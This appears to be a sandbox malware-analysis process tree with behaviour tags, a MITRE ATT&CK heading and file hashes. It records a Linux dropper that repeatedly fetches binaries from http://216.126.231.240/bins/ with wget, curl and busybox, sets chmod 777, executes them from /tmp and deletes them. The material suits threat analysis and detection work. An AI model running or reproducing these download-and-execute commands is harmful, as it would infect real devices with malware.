/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:884
-
-
/bin/chmodchmod 777 vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr./vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:887
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:888
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:890
-
-
/bin/chmodchmod 777 mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9./mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:893
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:894
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:898
-
-
/bin/chmodchmod 777 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7./0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:901
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:902
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:904
-
-
/bin/chmodchmod 777 NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo./NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:907
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:908
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:910
-
-
/bin/chmodchmod 777 j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH./j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:913
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:914
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:916
-
-
/bin/chmodchmod 777 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4./9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:919
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:920
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:922
-
-
/bin/chmodchmod 777 Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ./Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:925
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:926
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:930
-
-
/bin/chmodchmod 777 bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd./bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:933
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:934
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:936
-
-
/bin/chmodchmod 777 glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ./glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:939
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:940
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:942
-
-
/bin/chmodchmod 777 qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p./qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:945
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97